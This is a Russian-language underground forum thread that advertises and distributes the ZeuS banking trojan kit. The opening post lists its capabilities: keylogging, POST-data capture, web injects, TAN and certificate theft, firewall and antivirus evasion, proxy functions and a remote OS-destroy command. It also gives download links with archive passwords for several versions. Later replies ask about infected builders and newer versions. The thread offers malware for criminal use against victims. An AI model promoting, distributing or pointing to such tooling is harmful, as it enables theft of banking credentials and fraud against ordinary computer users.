Вернуться   GraBBerZ.CoM - ICQ | Proxy | Бруты | Дедики | Эксплоиты > Underground > Virology

Ответ
 
Опции темы Опции просмотра

ZeuS
Старый 22.03.2008, 15:38   #1
l
e
m
 
Аватар для flem
 
flem вне форума
Регистрация: 06.10.2006
Сообщений: 2,344
Респекты: 3,820

ZeuS

Описалово

ZeuS - Шпионское ПО (Spyware, далее "бот") для 32-х разрядной MS Windows 2000/XP+ служит для управления компьютерами жертв и получения с них информации при помощи ведения логов.

ZeuS состоит из трех частей:
Панель управления, которая устанавливается на сервер(а).
Билдер, является приложением для Windows, служит для задания конфигурации бота.
Бот, является приложением для Windows, но уже запускается на компьютере жертвы.
Внимание! В зависимости от количества активных ботов, сборки, и настройки, вам понадобится от обычного хостинга до мощного сервера или серверов.

ZeuS имеет следующие основные возможности и свойства (здесь приведен полный список, в вашей сборке часть этого списка может отсутствовать):
Бот:
Написан на VC++ 8.0, без использования RTL и т.д., на чистом WinAPI, за счет этого достигается маленький размер (10-25Кб, зависит от сборки).
Не имеет собственного процесса, за счет этого нельзя обнаружить в списке процессов.
Обход большинства фаерволов (включая популярный Outpost Firewall версий 3, 4, но сущетвует временная небольшая проблема с антишпионом). Не дает гарантии беспрепятственного приема входящих соединений.
Сложно обнаружить поиском/анализом, бот устанавливается жертве и создает файл с временем системных файлов и произвольным размером.
Работает в лимитированных учетных записях Windows (работа в гостевой учетной записи в настоящее время не поддерживается).
Невидим для экваристики антивирусов, тело бота зашифровано.
Некоем образом не создает подозрения на свое присутствие, если вы это не захотите. Здесь имеется ввиду то, что любят делать многие авторы spyware: выгрузка фаерволов, антивирусов, запрет на их обновление, блокировка Ctrl+Alt+Del и т.д.
Блокировка Windows Firewall (данная функция требуется только для беспрепятственного приема входящих соединений).
Все свои настройки/логи/команды бот хранит/принимает/передает в зашифрованном виде по HTTP(S) протоколу. (т.е. в текстовом виде данные будете видеть только вы, все остальное бот<->сервер будет выглядеть как мусор).
Обнаружение NAT при помощи проверки своего IP через указанный вами сайт.
Отдельный файл конфигурации, что позволяет себя защитить от потери ботнета в случаи недоступности основного сервера. Плюс дополнительные (резервные) файлы конфигурации, к которым бот будет обращаться, когда не будет доступен основной файл конфигурации. Эта система гарантирует выживание вашей ботнета в 90% случаях.
Возможность работать с любыми браузерами/программами работающими через wininet.dll (Internet Explorer, AOL, Maxton и т.д.):
Перехват POST-данных + перехват нажатых клавиш (включая вставленные данные из буфера обмена).
Прозрачный URL-редирект (на фейк-сайты и т.д.) c заданием простейших условий редиректа (например: только при GET или POST запросе, при наличии или отсутствии определенных данных в POST-запросе).
Прозрачная HTTP(S) подмена содержимого (Веб-инжект, который позволяет подменять не только HTML страницы, но и любой другой тип данных). Подмена задается при помощи указания масок подмены.
Получение содержимого нужной страницы с исключением HTML-тегов. Основано на Веб-инжекте.
Настраиваемый TAN-граббер для любых стран.
Получения списка вопросов и ответов в банке "Bank Of America" после успешной авторизации.
Удаление нужных POST-данных на нужных URL.
ИДЕАЛЬНОЕ РЕШЕНИЕ ДЛЯ ВИРТУАЛЬНЫХ КЛАВИАТУР: После захода на нужную URL, происходит получение скриншота в области экрана, где была нажата левая кнопка мыши.
Получение сертификатов из хранилища "MY" (сертификаты с пометкой "Не экспортируемый" не экспортируются корректно) и его очистка. После это любой импортируемый сертификат будет сохранен на сервер.
Перехват логина/пароля протоколов POP3 и FTP в независимости от порта и запись его в лог только при удачной авторизации.
Изменение локального DNS, удаление/добавление записей в файл %system32%\drivers\etc\hosts, т.е. сопоставление указанного домена с указанным IP для WinSocket.
Сохраняет содержимое Protected Storage при первом запуске на компьютере.
Удаляет Сookies из кэша Internet Explorer при первом запуске на компьютере.
Поиск на логических дисках файлов по маске или загрузка конкретного файла.
Запись только что посещенных страницы при первом запуске на компьютере. Полезен при установки через сплойты, если вы покупаете загрузки у подозрительного сервиса, можно узнать что грузится еще параллельно.
Получение скриншота с компьютера жертвы в реальном времени, компьютер должен находится вне NAT.
Прием команд от серверной части и отправка отчета назад об успешном выполнении. (В настоящее время запуск локального/удаленного файла, немедленное обновление файла конфигурации, уничтожение ОС).
Socks4-сервер.
HTTP(S) PROXY-сервер.
Обновление бота до последней версии (URL новой версии прописывается в файле конфигурации).


Панель управления:
Для работы требуется PHP + MySQL.
Простой инсталлятор (обычно хватает ввода данных юзера MySQL и нажатия кнопки 'Install').
Многопользовательский режим, каждому пользователю можно задать определенные права доступа.
Статистика установок(инсталлов, заражений).
Статистика ботов находящихся в онлайн.
Разделение ботнета на сабботнеты.
Обзор онлайновых ботов (так же возможен фильтр)
Просмотр скриншота в реальном времени.
Просмотр и проверка Sock4.
Время нахождения бота в онлайн.
Скорость соединения (только для ботов вне NAT).
Хранении логов в базе данных. Это дает следующие преимущества:
Поиск логов по фильтру содержимого.
Поиск логов по шаблонам с выделением нужных POST данных (например позволяет выделять на сайте http://rambler.ru/ только логи и пароль, отбрасывая при поиски все остальные данные).
Хранение логов в зашифрованных файлах, в структуре директорий ботнет\страна\ID компьютера.
Отдача команд ботам (так же возможен фильтр).
При знании PHP вы можете самостоятельно перенастроить панель управления по вашем вкусу.


Билдер:
Написан на VC++ 8.0, без использования RTL и т.д. на чистом WinAPI, за счет этого достигается маленький размер (зависит от сборки, в сборке с декодером логов размер будет более 400кб, т.к. будет включена база стран по IP).
Просмотр статуса текущей системы, в качестве теста бота вы можете запустить его на своем компьютере, а потом нажатием одной кнопки удалить его.
Декодер логов, с распределением по странам.
Билдер файла конфигурации (шифрованного) и самого бота.
Полиморфный криптор BETA. В настоящее время находится на стадии тестирования, и не гарантирует сто процентную защиту от антивурсов. Но гарантировано доведение данной функции до ума в ближайшее время.

Выкладываю пока запароленный архив, пароль тем у кого репы выше 100.

Справка в архиве прилагаестя, на русском)


Скачать
пасс xfg7u7)(!@3

Добавлено через 13 минут
zeus v1.0.3.7 + админка и мануал (на вирус не проверял)
Держите http://webfile.ru/1644296 пасс 123


Version: 2.0.8.9

Скрытый текст (вы должны войти под своим логином или зарегистрироваться и иметь 1 сообщение(ий)):
У вас нет прав чтобы видеть скрытый текст, содержащейся здесь.


пас grabberz.com
  Ответить с цитированием
Респектов за этот пост: 6

Старый 21.06.2013, 21:27   #136
kilobyte
 
Аватар для POCT
 
POCT вне форума
Регистрация: 20.07.2011
Адрес: Scanner.FuckAV.ru
Сообщений: 112
Респекты: 38
Или бросить такой софт, или еще можно попробовать запустить на линухе под вайном (такая фича еще не очень распространена).

С другой стороны, также можно разобрать по кусочкам все это дело, но это уже для продвинутых.
  Ответить с цитированием

Старый 23.06.2013, 16:38   #137
bit
 
Аватар для phonjaxx
 
phonjaxx вне форума
Регистрация: 20.02.2013
Сообщений: 43
Респекты: 4
POCT, ну офк ты очень интересные вещи говоришь, только для обычного краба-юзера, типа меня, линуксы, декомпиляции, ковырянии в коде - вещи невыполнимые, ибо знаний не хватит.

дык зевс точно не склеен с билдом ?
  Ответить с цитированием

Старый 24.12.2013, 20:51   #138
bot
 
Аватар для gmanforce
 
gmanforce вне форума
Регистрация: 07.12.2013
Сообщений: 1
Респекты: 0
Есть новый зевс ?
  Ответить с цитированием
Ответ

Метки
backdoor, rat, spy-net, бэкдор, троян

Опции темы
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.
Быстрый переход



Время: 09:43



Powered by vBulletin® Version 3.7.6
Copyright ©2000 - 2017, Jelsoft Enterprises Ltd. Перевод: zCarot